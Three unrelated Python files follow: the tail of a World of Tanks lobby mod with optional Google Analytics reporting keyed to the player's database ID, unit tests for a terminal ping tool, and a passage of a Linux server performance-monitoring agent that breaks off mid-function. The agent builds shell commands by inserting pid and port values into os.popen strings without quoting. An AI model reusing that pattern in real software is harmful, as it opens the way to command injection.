self.click) link = makeHtmlString('html_templates:lobby/system_messages', 'link', { 'text' : '%s' % json_text['messageLinkName'], 'linkType': '%s' % self.lin1 }) p__msg = '%s<br><br>' % json_text['header'].format(**json_text) p__msg += '<font color="#E2D2A2" size="15"><b>%s</b></font>' % link SystemMessages.pushMessage(p__msg, SystemMessages.SM_TYPE.GameGreeting) def click(self, isConfirmed): if isConfirmed and self.lin1: if self.lin1.lower().startswith('http:') or self.lin1.lower().startswith('https:'): if config.data['openLinkInGameBrowser']: browser.open(self.lin1) else: BigWorld.wg_openWebBrowser(self.lin1) def openLink(self, action): if self.lin1 in action: self.click(True) return True return class Statistics(object): def __init__(self): self.analytics_started = False self.thread_analytics = None self.user = None self.old_user = None def analytics_start(self): if not self.analytics_started: lang = str(getLanguageCode()).upper() param = urllib.urlencode({ 'v' : 1, # Version. 'tid': config.data['statisticTid'], 'cid': self.user, # Anonymous Client ID. 't' : 'screenview', # Screenview hit type. 'an' : 'modPackInformer "%s"' % config.data['name'], # App name. 'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']), 'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description. 'ul' : '%s' % lang, 'sc' : 'start' }) urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read() self.analytics_started = True self.old_user = BigWorld.player().databaseID def start(self): player = BigWorld.player() if self.user and self.user != player.databaseID: self.old_user = player.databaseID self.thread_analytics = threading.Thread(target=self.end, name='Thread') self.thread_analytics.start() self.user = player.databaseID self.thread_analytics = threading.Thread(target=self.analytics_start, name='Thread') self.thread_analytics.start() def end(self): if self.analytics_started: lang = str(getLanguageCode()).upper() param = urllib.urlencode({ 'v' : 1, # Version. 'tid': config.data['statisticTid'], 'cid': self.user, # Anonymous Client ID. 't' : 'screenview', # Screenview hit type. 'an' : 'modPackInformer "%s"' % config.data['name'], # App name. 'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']), 'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description. 'ul' : '%s' % lang, 'sc' : 'end' }) urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read() self.analytics_started = False class p__Browser(BaseTicker): externalBrowser = dependency.descriptor(IExternalLinksController) internalBrowser = dependency.descriptor(IBrowserController) def __init__(self): super(p__Browser, self).__init__() self.__browserID = 'modPackInformer' return def _dispose(self): self.__browserID = 'modPackInformer' super(p__Browser, self)._dispose() return def open(self, link, internal=True): if internal: if self.internalBrowser is not None: self.__showInternalBrowser(link) else: self.__showExternalBrowser(link) else: self.__showExternalBrowser(link) return @process def __showInternalBrowser(self, link): self.__browserID = yield self.internalBrowser.load(url=link, browserID=self.__browserID) def __showExternalBrowser(self, link): if self.externalBrowser is not None: self.externalBrowser.open(link) def hookedGetLabels(self): return [{ 'id' : DIALOG_BUTTON_ID.SUBMIT, 'label' : self._submit, 'focused': True }, { 'id' : DIALOG_BUTTON_ID.CLOSE, 'label' : self._close, 'focused': False }] def hookedLobbyPopulate(self): hookLobbyPopulate(self) start = threading.Thread(target=updater.start, name='updater.start') start.start() if config.data['statistic']: stat.start() def hookedOnClickAction(*args): if updater.openLink(args[3]): return hookOnClickAction(*args) def init(): print '[LOAD_MOD]: [modPackInformer, by spoter]' def fini(): stat.end() config = Config() browser = p__Browser() updater = Updater() stat = Statistics() ConfirmDialogButtons.getLabels = hookedGetLabels hookLobbyPopulate = LobbyView._populate LobbyView._populate = hookedLobbyPopulate hookOnClickAction = NotificationListView.onClickAction NotificationListView.onClickAction = hookedOnClickAction
test_legacy.py
'''cping.layouts.legacy tests''' import contextlib import io import re import threading import unittest import cping.layouts.legacy import cping.protocols class TestLayout(unittest.TestCase): '''cping.layouts.legacy.Layout tests.''' def test___call__(self): '''Ensure calling layout properly enters and exits the alternate buffer. The layout should automatically exit when no hosts are running.''' exit_signal = threading.Event() layout = cping.layouts.legacy.Layout(cping.protocols.Ping(0.5)) layout.protocol.ping_loop = lambda _: exit_signal.wait() layout.add_host('host1').start() layout.add_host('host2').start() output = io.StringIO() with contextlib.redirect_stdout(output): layout_thread = threading.Thread(target=layout) layout_thread.start() exit_signal.set() layout_thread.join() # Enter alternate buffer and move to 1;1 self.assertTrue(output.getvalue().startswith('\x1b[?1049h\x1b[H')) # Exit alternate buffer self.assertIn('\x1b[?1049l', output.getvalue()) class TestFormatHost(unittest.TestCase): '''cping.layouts.legacy.format_host tests.''' def test_host_status(self): '''The host's status, if set, should be shown.''' host = cping.protocols.Ping()('localhost') host.status = 'Test status' line = cping.layouts.legacy.format_host(host, 4, 80) self.assertIn(host.status, line) def test_line_width(self): '''The line-width should update the host's results length.''' # pylint: disable=no-member # Linter bug host = cping.protocols.Ping()('localhost') old_length = host.raw_results.maxlen cping.layouts.legacy.format_host(host, 4, 150) self.assertGreater(host.raw_results.maxlen, old_length) def test_statistics(self): '''The host's statistics are shown.''' host = cping.protocols.Ping()('localhost') for result in [-1, -1, 1, 2]: host.add_result(result) line = cping.layouts.legacy.format_host(host, 4, 80) self.assertIn(' 1000.00', line) self.assertIn(' 1500.00', line) self.assertIn(' 2000.00', line) self.assertIn(' 707', line) self.assertIn(' 50%', line) class TestGetHistogram(unittest.TestCase): '''cping.layouts.legacy.get_histogram tests.''' def test_results(self): '''Ensure the results are correctly represented.''' host = cping.protocols.Ping()('localhost') for result in [-1, 0, -1, -1, 0]: host.add_result(result) line = cping.layouts.legacy.get_histogram(host, 80) self.assertIn('.!..!', strip_colors(line)) class TestGetColor(unittest.TestCase): '''cping.layouts.legacy.get_color tests.''' def test_color(self): '''Get the ANSI code for a color''' self.assertEqual(cping.layouts.legacy.get_color('red'), '\x1b[31m') def test_last_color(self): '''Getting a color that is the last color should return an empty string.''' self.assertEqual(cping.layouts.legacy.get_color('red', 'red'), '') def test_non_existent_color(self): '''A non-existent color should return an empty string''' self.assertEqual(cping.layouts.legacy.get_color('hi'), '') class TestGetTable(unittest.TestCase): '''cping.layouts.legacy.get_table tests.''' def test_overflow(self): '''Create a table with too many hosts to ensure they don't overflow.''' hosts = [cping.protocols.Ping()(str(x)) for x in range(60)] table = cping.layouts.legacy.get_table(hosts) self.assertIn(' more', table) table = cping.layouts.legacy.get_table(hosts, all_hosts=True) self.assertNotIn(' more', table) def strip_colors(data): '''Remove the ANSI foreground colors from the string `data`.''' return re.sub(r'\x1b\[\d*m', '', data)
performance_monitor1.py
#!/usr/bin/env python # -*- coding:utf-8 -*- # Author: leeyoshinari import os import re import time import json import copy import queue import traceback import threading from concurrent.futures import ThreadPoolExecutor import requests import influxdb from common import handle_exception, get_ip from logger import logger, cfg class PerMon(object): def __init__(self): self.check_sysstat_version() self.IP = get_ip() self.thread_pool = cfg.getAgent('threadPool') if cfg.getAgent('threadPool') >= 0 else 0 self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []} # port、pid、status、startTime self.is_system = cfg.getMonitor('isMonSystem') # Whether to monitor the server system self.error_times = cfg.getMonitor('errorTimes') self.sleepTime = cfg.getMonitor('sleepTime') self.maxCPU = cfg.getMonitor('maxCPU') self.CPUDuration = cfg.getMonitor('CPUDuration') self.isCPUAlert = cfg.getMonitor('isCPUAlert') self.minMem = cfg.getMonitor('minMem') self.isMemAlert = cfg.getMonitor('isMemAlert') self.isPidAlert = cfg.getMonitor('isPidAlert') self.errorTimesOfPid = cfg.getMonitor('errorTimesOfPid') self.frequencyFGC = cfg.getMonitor('frequencyFGC') self.isJvmAlert = cfg.getMonitor('isJvmAlert') self.echo = cfg.getMonitor('echo') self.isDiskAlert = cfg.getMonitor('isDiskAlert') self.maxDiskUsage = cfg.getMonitor('maxDiskUsage') / 100 self.isTCP = cfg.getMonitor('isTCP') self.timeSetting = cfg.getMonitor('timeSetting') system_interval = cfg.getMonitor('systemInterval') port_interval = cfg.getMonitor('portInterval') self.system_interval = max(system_interval, 1) # If the set value is less than 1, the default is 1 self.port_interval = max(port_interval, 1) # If the set value is less than 1, the default is 1 self.system_interval = self.system_interval - 1.1 # Program running time self.system_interval = max(self.system_interval, 0) self.port_interval = self.port_interval - 1.03 # Program running time self.port_interval = max(self.port_interval, 0) self.system_version = '' # system version self.cpu_info = '' self.cpu_usage = 0.0 # CPU usage self.cpu_cores = 0 # number of CPU core self.mem_usage = 0.0 # memory usage self.total_mem = 0 # totel memory, unit: G self.total_mem_100 = 0 # total memory, unit: 100*G self.nic = '' # network card self.all_disk = [] # disk number self.total_disk = 1 # total disk size, unit: M self.total_disk_h = 0 # total disk size, unit:T or G self.network_speed = cfg.getAgent('nicSpeed') # bandwidth self.Retrans_num = self.get_RetransSegs() # TCP retrans number self.get_system_version() self.get_cpu_cores() self.get_total_mem() self.get_system_nic() self.get_disks() self.get_system_net_speed() self.get_total_disk_size() self.monitor_task = queue.Queue() # FIFO queue # thread pool, +2 is the need for monitoring system and registration service self.executor = ThreadPoolExecutor(self.thread_pool + 2) self.client = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'), cfg.getInflux('password'), cfg.getInflux('database')) # influxdb connection self.FGC = {} # full gc times self.FGC_time = {} # full gc time self.last_cpu_io = [] # recently cpu usage self.is_java = {} # whether is java, 0 or 1 self.monitor() @property def start(self): return self._msg @start.setter def start(self, value): if value['port']: self.is_java_server(value['port']) # Determine whether the port is java service if value['port'] in self._msg['port']: # If the port has been monitored, update it index = self._msg['port'].index(value['port']) self._msg['pid'][index] = value['pid'] # If the monitoring has been stopped, update the monitoring status and start monitoring time if self._msg['isRun'][index] == 0: self._msg['isRun'][index] = value['is_run'] self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') self.monitor_task.put((self.write_cpu_mem, index)) # Put the monitoring task into the queue self.FGC[str(value['port'])] = 0 # reset FGC times self.FGC_time[str(value['port'])] = [] # reset FGC time if self.monitor_task.qsize() > 0: # If the queue is not empty, the monitoring status is set to 2 self._msg['isRun'][index] = 2 # queueing else: self._msg['isRun'][index] = value['is_run'] self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') else: self._msg['pid'].append(value['pid']) # If the port has not been monitored, add it self._msg['port'].append(value['port']) self._msg['isRun'].append(value['is_run']) self._msg['startTime'].append(time.strftime('%Y-%m-%d %H:%M:%S')) self.monitor_task.put((self.write_cpu_mem, len(self._msg['port'])-1)) # Put the monitoring task into the queue self.FGC.update({str(value['port']): 0}) # initialize FGC times self.FGC_time.update({str(value['port']): []}) # initialize FGC time if self.monitor_task.qsize() > 0: # If the queue is not empty, the monitoring status is set to 2 self._msg['isRun'][-1] = 2 # queueing else: raise Exception('Parameter Exception') @property def stop(self): return self._msg @stop.setter def stop(self, value): index = self._msg['port'].index(value['port']) self._msg['isRun'][index] = value['is_run'] def worker(self): """ Get data from the queue and start monitoring :return: """ while True: func, param = self.monitor_task.get() func(param) self.monitor_task.task_done() def monitor(self): """ start monitoring :return: """ for i in range(self.thread_pool + 2): self.executor.submit(self.worker) # Put registration and cleanup tasks in the queue self.monitor_task.put((self.register_agent, True)) # Put the tasks of the monitoring system into the queue self.monitor_task.put((self.write_system_cpu_mem, 1)) def write_cpu_mem(self, index): """ Monitoring port. CPU, Memory, jvm(Java), disk read and write :param index: Subscript index of the port :return: """ self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') # Update start monitoring time jvm = 0.0 # Initialize jvm, used for non-java services run_error_times = 0 # Initialize the times that the continuous failure to execute monitoring commands port = self._msg['port'][index] pid = self._msg['pid'][index] is_run_jvm = self.is_java.get(str(port), 0) line = [{'measurement': self.IP, 'tags': {'type': str(port)}, 'fields': { 'c_time': '', 'cpu': 0.0, 'wait_cpu': 0.0, 'mem': 0.0, 'jvm': 0.0, 'rKbs': 0.0, 'wKbs': 0.0, 'iodelay': 0.0, 'tcp': 0, 'close_wait': 0, 'time_wait': 0 }}] while True: if self._msg['isRun'][index] > 0: # Start monitoring self._msg['isRun'][index] = 1 # Reset the status to monitoring try: pid_info = self.get_pid_cpu_mem_io(pid) # get CPU, disk read and write if not pid_info: # If the CPU usage rate is None, the monitoring command is executed wrong. logger.warning(f'The CPU is NOne, the abnormal pid is {pid}') pid = port_to_pid(port) # Query pid based on port if pid: # If the pid exists, update it self._msg['pid'][index] = pid self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') else: run_error_times += 1 # If continuous execution commands fails, stop monitoring if run_error_times > self.error_times: self._msg['isRun'][index] = 0 logger.error(f'The port {port} fails to execute commands continuously within ' f'{self.error_times * self.sleepTime}s, and the monitoring has stopped.') time.sleep(1) break if self.isPidAlert: if run_error_times > self.errorTimesOfPid: msg = f'The port {port} of the {self.IP} failed to execute commands continuously within ' \ f'{self.errorTimesOfPid * self.sleepTime}s, and the monitoring had been stopped.' logger.warning(msg) self._msg['isRun'][index] = 0 thread = threading.Thread(target=notification, args=(msg,)) # Start thread to send email thread.start() time.sleep(1) break time.sleep(self.sleepTime) continue line[0]['fields']['c_time'] = time.strftime("%Y-%m-%d %H:%M:%S") line[0]['fields']['cpu'] = pid_info['cpu'] line[0]['fields']['wait_cpu'] = pid_info['wait_cpu'] line[0]['fields']['mem'] = pid_info['mem'] line[0]['fields']['rKbs'] = pid_info['kB_rd'] line[0]['fields']['wKbs'] = pid_info['kB_wr'] line[0]['fields']['iodelay'] = pid_info['iodelay'] tcp_num = self.get_port_tcp(port) line[0]['fields']['tcp'] = tcp_num.get('tcp', 0) line[0]['fields']['close_wait'] = tcp_num.get('close_wait', 0) line[0]['fields']['time_wait'] = tcp_num.get('time_wait', 0) if is_run_jvm: jvm = self.get_jvm(port, pid) # get JVM size line[0]['fields']['jvm'] = jvm self.client.write_points(line) # write database logger.info(f'cpu_and_mem: port_{port},pid_{pid},{pid_info},{jvm}') run_error_times = 0 # If the monitoring command is executed successfully, reset it except(Exception): logger.error(traceback.format_exc()) time.sleep(self.sleepTime) time.sleep(self.port_interval) if self._msg['isRun'][index] == 0: # If status=0, stop monitoring logger.info(f'Port {port} has been stopped monitoring.') self.FGC[str(port)] = 0 self._msg['isRun'][index] = 0 break def write_system_cpu_mem(self, is_system): """ Monitoring system. CPU, Memory, Disk IO, Network, TCP :param is_system: :return: """ cpu_flag = True # Flag of whether to send mail when the CPU usage is too high mem_flag = True # Flag of whether to send mail when the free memory is too low echo = True # Flag of whether to clean up cache line = [{'measurement': self.IP, 'tags': {'type': 'system'}, 'fields': { 'c_time': '', 'cpu': 0.0, 'iowait': 0.0, 'usr_cpu': 0.0, 'mem': 0.0, 'mem_available': 0.0, 'rec': 0.0, 'trans': 0.0, 'net': 0.0, 'tcp': 0, 'retrans': 0 }}] for disk in self.all_disk: # The system disks exists in the format of 'sda-1'. Since influxdb cannot recognize the '-', need to replace it. # Other formats need to be verified disk_n = disk.replace('-', '') line[0]['fields'].update({disk_n: 0.0}) line[0]['fields'].update({disk_n + '_r': 0.0}) line[0]['fields'].update({disk_n + '_w': 0.0}) line[0]['fields'].update({disk_n + '_d': 0.0}) while True: if self.is_system: try: res = self.get_system_cpu_io_speed() # get CPU, memory, IO, network, TCP if res['disk'] and res['cpu'] is not None and res['mem'] is not None: for k, v in res['disk'].items(): line[0]['fields'][k] = min(v, 100.0) for k, v in res['disk_r'].items(): line[0]['fields'][k] = v for k, v in res['disk_w'].items(): line[0]['fields'][k] = v for k, v in res['disk_d'].items(): line[0]['fields'][k] = v line[0]['fields']['c_time'] = time.strftime("%Y-%m-%d %H:%M:%S") line[0]['fields']['cpu'] = res['cpu'] line[0]['fields']['iowait'] = res['iowait'] line[0]['fields']['usr_cpu'] = res['usr_cpu'] line[0]['fields']['mem'] = res['mem'] line[0]['fields']['mem_available'] = res['mem_available'] line[0]['fields']['rec'] = res['rece'] line[0]['fields']['trans'] = res['trans'] line[0]['fields']['net'] = res['network'] line[0]['fields']['tcp'] = res['tcp'] line[0]['fields']['retrans'] = res['retrans'] self.client.write_points(line) # write to database logger.info(f"system: CpuAndMem,{res['cpu']},{res['mem']},{res['disk']},{res['disk_r']}," f"{res['disk_w']},{res['rece']},{res['trans']},{res['network']}, " f"{res['tcp']}, {res['retrans']}") if len(self.last_cpu_io) > self.CPUDuration: self.last_cpu_io.pop(0) self.last_cpu_io.append(res['cpu']) self.cpu_usage = sum(self.last_cpu_io) / len(self.last_cpu_io) # CPU usage, with % self.mem_usage = 1 - res['mem'] / self.total_mem # Memory usage, without % if self.cpu_usage > self.maxCPU: msg = f'{self.IP} server CPU average usage is {self.cpu_usage}%, it is too high.' logger.warning(msg) if self.isCPUAlert and cpu_flag: cpu_flag = False # Set to False to prevent sending email continuously thread = threading.Thread(target=notification, args=(msg,)) thread.start() else: cpu_flag = True # If CPU usage is normally, reset it to True if res['mem'] <= self.minMem: msg = f"{self.IP} system free memory is {res['mem']}G, it is too low." logger.warning(msg) if self.isMemAlert and mem_flag: mem_flag = False # Set to False to prevent sending email continuously thread = threading.Thread(target=notification, args=(msg, )) thread.start() if self.echo and echo: echo = False # Set to False to prevent cleaning up cache continuously thread = threading.Thread(target=self.clear_cache, args=()) thread.start() else: mem_flag = True # If free memory is normally, reset it to True. echo = True except(Exception): logger.error(traceback.format_exc()) time.sleep(self.system_interval) else: time.sleep(3) @handle_exception(is_return=True, default_value=(None, None)) def get_cpu_mem(self, pid): """ Get CPU usage and Memory of pid. Now it is not used :param pid: pid :return: CPU usage(%), Memory(G) """ cpu = None mem = None # result = os.popen(f'top -n 1 -b -p {pid}').readlines() result = os.popen(f'top -n 1 -b |grep -P {pid}').readlines() res = [ress.split() for ress in result] logger.debug(f'The CPU and Mem of pid {pid} is: {res}') for r in res: if str(pid) == r[0]: ind = r.index(str(pid)) cpu = float(r[ind + 8]) / self.cpu_cores # CPU usage mem = float(r[ind + 9]) * self.total_mem_100 # Memory return cpu, mem @handle_exception(is_return=True, default_value=[]) def get_pid_cpu_mem_io(self, pid): """ Get CPU usage, Memor, and disk of pid. :param pid: pid :return: CPU usage(%), Memory(G), Disk Read and Write(kB/s) """ pid_info = {'kB_rd': 0.0, 'kB_wr': 0.0, 'iodelay': 0.0, 'VSZ': 0.0, 'RSS': 0.0, 'mem': 0.0, 'usr_cpu': 0.0, 'system_cpu': 0.0, 'guest_cpu': 0.0, 'wait_cpu': 0.0, 'cpu': 0.0} res = os.popen(f'pidstat -u -r -d -p {pid} 1 1').readlines()[::-1][:9] if res: for i in range(len(res)): if 'iodelay' in res[i]: io = res[i - 1].split() pid_info['kB_rd'] = float(io[3]) / 1024 # Read from disk per second (kB) pid_info['kB_wr'] = float(io[4]) / 1024 # Write to disk per second (kB) # pid_info['iodelay'] = float(io[6]) # I/O delay(unit: clock cycle) if 'MEM' in res[i]: memory = res[i - 1].split() # pid_info['VSZ'] = float(memory[5]) / 1024 # Virtual memory # pid_info['RSS'] = float(memory[6]) / 1024 # Physical memory pid_info['mem'] = float(memory[7]) * self.total_mem_100 # Memory size if 'CPU' in res[i]: cpu_res = res[i - 1].split() # pid_info['usr_cpu'] = float(cpu_res[3]) / self.cpu_cores # pid_info['system_cpu'] = float(cpu_res[4]) / self.cpu_cores # pid_info['guest_cpu'] = float(cpu_res[5]) / self.cpu_cores # pid_info['wait_cpu'] = float(cpu_res[6]) / self.cpu_cores # CPU usage waiting for context switch pid_info['cpu'] = float(cpu_res[7]) / self.cpu_cores # CPU usage return pid_info else: return res @handle_exception(is_return=True, default_value=0) def get_jvm(self, port, pid): """ JVM size :param port: port :param pid: pid :return: jvm(G) """ result = os.popen(f'jstat -gc {pid}').readlines()[1] res = result.strip().split() logger.debug(f'The JVM of pid {pid} is: {res}') mem = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # calculate JVM fgc = int(res[14]) if self.FGC[str(port)] < fgc: # If the times of FGC increases self.FGC[str(port)] = fgc self.FGC_time[str(port)].append(time.time()) if len(self.FGC_time[str(port)]) > 2: # Calculate FGC frequency frequency = self.FGC_time[str(port)][-1] - self.FGC_time[str(port)][-2] if frequency < self.frequencyFGC: # If FGC frequency is too high, send email. msg = f'The Full GC frequency of port {port} is {frequency}, it is too high. Server IP: {self.IP}' logger.warning(msg) if self.isJvmAlert: thread = threading.Thread(target=notification, args=(msg, )) thread.start() # Write FGC times and time to log logger.warning(f"The port {port} has Full GC {self.FGC[str(port)]} times.") elif self.FGC[str(port)] > fgc: # If the times of FGC is reduced, the port may be restarted, then reset it self.FGC[str(port)] = 0 if self.FGC[str(port)] == 0: # If the times of FGC is 0, reset FGC time. self.FGC_time[str(port)] = [] return mem / 1048576 # 1048576 = 1024 * 1024 @handle_exception(is_return=True, default_value={}) def get_system_cpu_io_speed(self): """ Get system CPU usage, memory, disk IO, network speed, etc. :return: """ disk = {} disk_r = {} disk_w = {} disk_d = {} cpu = None iowait = None usr_cpu = None bps1 = None bps2 = None rece = None trans = None network = None if self.nic: bps1 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines() logger.debug(f'The result of speed for the first time is: {bps1}') result = os.popen('iostat -x -m 1 2').readlines() logger.debug(f'The result of Disks are: {result}') if self.nic: bps2 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines() logger.debug(f'The result of speed for the second time is: {bps2}') result = result[len(result) // 2 - 1:] disk_res = [line.strip() for line in result if len(line) > 5] for i in range(len(disk_res)): if 'avg-cpu' in disk_res[i]: cpu_res = disk_res[i + 1].strip().split() # Free CPU cpu = 100 - float(cpu_res[-1]) # CPU usage iowait = float(cpu_res[-3]) usr_cpu = float(cpu_res[0]) logger.debug(f'System CPU usage rate is: {cpu}%') continue if 'Device' in disk_res[i]: for j in range(i+1, len(disk_res)): disk_line = disk_res[j].split() disk_num = disk_line[0].replace('-', '') disk.update({disk_num: float(disk_line[-1])}) # IO disk_r.update({disk_num + '_r': float(disk_line[2])}) # Read MB/s disk_w.update({disk_num + '_w': float(disk_line[8])}) # Write MB/s disk_d.update({disk_num + '_d': float(disk_line[14])}) # MB/s logger.debug(f'The result of disks are: IO: {disk}, Read: {disk_r}, Write: {disk_w}') break mem, mem_available = self.get_free_memory() if bps1 and bps2: data1 = bps1[0].split() data2 = bps2[0].split() rece = (int(data2[1]) - int(data1[1])) / 1048576 trans = (int(data2[9]) - int(data1[9])) / 1048576 # 400 = 8 * 100 / 2 # Why multiply by 8, because 1MB/s = 8Mb/s. # Why divided by 2, because the network card is in full duplex mode. network = 400 * (rece + trans) / self.network_speed logger.debug(f'The bandwidth of ethernet is: Receive {rece}MB/s, Transmit {trans}MB/s, Ratio {network}%') tcp, Retrans = self.get_tcp() return {'disk': disk, 'disk_r': disk_r, 'disk_w': disk_w, 'disk_d': disk_d, 'cpu': cpu, 'iowait': iowait, 'usr_cpu': usr_cpu, 'mem': mem, 'mem_available': mem_available, 'rece': rece, 'trans': trans, 'network': network, 'tcp': tcp, 'retrans': Retrans} @staticmethod def get_free_memory(): """ Get system memory :return: free Memory, available Memory """ mem, mem_available = 0, 0 result = os.popen('cat /proc/meminfo').readlines() logger.debug(f'The free memory is: {result}') for res in result: if 'MemFree' in res: mem = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024 continue if 'MemAvailable' in res: mem_available = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024 continue if mem and mem_available: break return mem, mem_available '''def get_handle(pid): """ Get the number of handles occupied by the process :param pid: pid :return: the number of handles """ result = os.popen("lsof -n | awk '{print $2}'| sort | uniq -c | sort -nr | " + "grep {}".format(pid)).readlines() res = result[0].strip().split(' ') logger.debug(res) handles = None if str(pid) in res: handles = int(res[0]) return handles''' @handle_exception(is_return=True, default_value=(0, 0)) def get_tcp(self): """ Get the number of TCP and calculate the retransmission rate :return: """ tcp = 0 Retrans = 0 if self.isTCP: result = os.popen('cat /proc/net/snmp |grep Tcp').readlines() tcps = result[-1].split() logger.debug(f'The TCP is: {tcps}') tcp = int(tcps[9]) # TCP connections Retrans = int(tcps[-4]) - self.Retrans_num self.Retrans_num = int(tcps[-4]) return tcp, Retrans @handle_exception(is_return=True, default_value={}) def get_port_tcp(self, port): """ Get the number of TCP connections for the port :param port: port :return: """ tcp_num = {} res = os.popen(f'netstat -ant |grep {port}').read() tcp_num.update({'tcp': res.count('tcp')}) tcp_num.update({'established': res.count('ESTABLISHED')}) tcp_num.update({'close_wait': res.count('CLOSE_WAIT')}) tcp_num.update({'time_wait': res.count('TIME_WAIT')}) return tcp_num def get_cpu_cores(self): """ Get CPU information :return: """ cpu_model = None cpu_num = 0 cpu_core = 0 try: result = os.popen('cat /proc/cpuinfo | grep "model name" |uniq').readlines()[0] cpu_model = result.strip().split(':')[1].strip() logger.info(f'The CPU model is {cpu_model}') except Exception as err: logger.error('The CPU model is not found.') logger.error(err) try: result = os.popen('cat /proc/cpuinfo | grep "physical id" | uniq | wc -l').readlines()[0] cpu_num = int(result) logger.info(f'The number of CPU is {cpu_num}') except Exception as err: logger.error('The number of CPU is not found.') logger.error(err) try: result = os.popen('cat /proc/cpuinfo | grep "cpu cores" | uniq').readlines()[0] cpu_core = int(result.strip().split(':')[1].strip()) logger.info(f'The number of cores per CPU is {cpu_core}') except Exception as err: logger.error('The number of cores per CPU is not found.') logger.error(err) result = os.popen('cat /proc/cpuinfo| grep "processor"| wc -l').readlines()[0] self.cpu_cores = int(result) logger.info(f'The number of cores all CPU is {self.cpu_cores}') if cpu_model and cpu_num and cpu_core: self.cpu_info = f'{cpu_num} CPU(s), {cpu_core} core(s) pre CPU, total {self.cpu_cores} cores, ' \ f'CPU model is {cpu_model} ' elif cpu_model: self.cpu_info = f'total CPU cores is {self.cpu_cores}, CPU model is {cpu_model} ' else: self.cpu_info = f'total CPU cores is {self.cpu_cores}' @handle_exception(is_return=True) def get_total_mem(self): """ Get Memory :return: """ result = os.popen('cat /proc/meminfo| grep "MemTotal"').readlines()[0] self.total_mem = float(result.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024 self.total_mem_100 = self.total_mem / 100 logger.info(f'The total memory is {self.total_mem}G') @handle_exception() def get_disks(self): """ Get all disks number. :return: """ result = os.popen('iostat -x -k').readlines() if result: disk_res = [line.strip() for line in result if len(line) > 5] for i in range(len(disk_res)): if 'Device' in disk_res[i]: for j in range(i + 1, len(disk_res)): disk_line = disk_res[j].split() self.all_disk.append(disk_line[0]) logger.info(f'The system has {len(self.all_disk)} disks, disk number is {"、".join(self.all_disk)}') else: raise Exception('The system does not support the iostat, please install sysstat. ') @handle_exception(is_return=True) def get_system_nic(self): """ Get network card. Only one network card can be got. If the system uses multiple network cards, only the first one can be got. Use "cat /proc/net/dev" to view the order of the network cards. :return: """ network_card = [] result = os.popen('cat /proc/net/dev').readlines() # get network data logger.debug(f'The result for the first time is: {result}') time.sleep(1) result1 = os.popen('cat /proc/net/dev').readlines() # get network data again logger.debug(f'The result for the second time is: {result1}') for i in range(len(result)): if ':' in result[i]: data = result[i].split() data1 = result1[i].split() if data[0] == data1[0]: logger.debug(f'The first data change is {data}') logger.debug(f'The second data change is {data1}') if data[1] != data1[1] or data[9] != data1[ 9]: # If the data of network card changes, it means that the card is in use. network_card.append(data[0].strip(':')) logger.debug(f'The data of network card is {network_card}') if 'lo' in network_card: # 'lo' is 127.0.0.1, need to be deleted. network_card.pop(network_card.index('lo')) if len(network_card) > 0: self.nic = network_card[0] logger.info(f'The network card in use is {self.nic}') else: logger.error('The network card in use is not found.') @handle_exception(is_return=True) def get_total_disk_size(self): """ Get disk size :return: """ result = os.popen('df -m').readlines() logger.debug(f'The data of disk is {result}') for line in result: res = line.split() if '/dev/' in res[0]: size = float(res[1]) self.total_disk += size logger.debug(f'The disks total size is {self.total_disk}M') self.total_disk_h = self.total_disk / 1024 if self.total_disk_h > 1024: total = round(self.total_disk_h / 1024, 2) self.total_disk_h = f'{total}T' else: total = round(self.total_disk_h, 2) self.total_disk_h = f'{total}G' logger.info(f'The total size of disks is {self.total_disk_h}') @handle_exception(is_return=True, default_value=0) def get_used_disk_rate(self): """ Get disks usage :return: """ used_disk_size = 0 result = os.popen('df -m').readlines() logger.debug(f'The data of disk is {result}') for line in result: res = line.split() if '/dev/' in res[0]: size = float(res[2]) used_disk_size += size logger.info(f'The used size of disks is {used_disk_size}M') return used_disk_size / self.total_disk @handle_exception(is_return=True) def get_system_net_speed(self): """ Get bandwidth, Mbs :return: """ if self.nic: result = os.popen(f'ethtool {self.nic}').readlines() logger.debug(f'The bandwidth is {result}') for line in result: if 'Speed' in line: logger.debug(f'The bandwidth is {line}') res = re.findall(r"(\d+)", line) speed = int(res[0]) if 'G' in line: speed = speed * 1024 if 'K' in line: speed = speed / 1024 self.network_speed = speed break logger.info(f'The bandwidth of ethernet is {self.network_speed}Mb/s') @handle_exception(is_return=True) def get_system_version(self): """ Get system version :return: """ try: result = os.popen('cat /etc/redhat-release').readlines() # system release version logger.debug(f'The system release version is {result}') self.system_version = result[0].strip() except Exception as err: logger.warning(err) result = os.popen('cat /proc/version').readlines()[0] # system kernel version logger.debug(f'The system kernel version is{result}') res = re.findall(r"gcc.*\((.*?)\).*GCC", result.strip()) if res: self.system_version = res[0] else: res = re.findall(r"gcc.*\((.*?)\)", result.strip()) self.system_version = res[0] logger.info(f'system release/kernel version is {self.system_version}') @handle_exception(is_return=True, default_value=0) def get_RetransSegs(self): """ Get the number of TCP RetransSegs :return: """ Retrans = 0 if self.isTCP: result = os.popen('cat /proc/net/snmp |grep Tcp').readlines() tcps = result[-1].split() logger.debug(f'The TCP is: {tcps}') Retrans = int(tcps[-4]) return Retrans def is_java_server(self, port): """ Determine whether the port is java service :param port: port """ pid = port_to_pid(port) try: result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1] res = result.strip().split(' ') logger.info(f'The JVM 